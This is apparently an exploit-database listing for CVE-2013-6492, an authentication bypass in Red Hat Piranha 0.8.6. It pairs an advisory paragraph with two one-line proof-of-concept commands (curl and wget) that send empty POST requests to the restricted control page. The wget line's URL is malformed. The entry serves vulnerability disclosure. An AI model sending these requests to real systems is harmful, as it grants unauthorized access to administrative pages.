RedHat Piranha - Remote Security Bypass

Author: Andreas Schiermeier
type: remote
platform: linux
port: 
date_added: 2013-12-11  
date_updated: 2015-12-24  
verified: 1  
codes: CVE-2013-6492;OSVDB-101854  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 39097.txt  

source: https://www.securityfocus.com/bid/65587/info

Red Hat Piranha is prone to a remote security bypass vulnerability.

An attacker can exploit this issue to gain unauthorized access to the restricted pages of the application, this may lead to further attacks.

Red Hat Piranha 0.8.6 is vulnerable; other versions may also be affected.

curl -d'' -I http://www.example.com:3636/secure/control.php
wget -qO- --post-data='' http://www.example.com3636/secure/control.php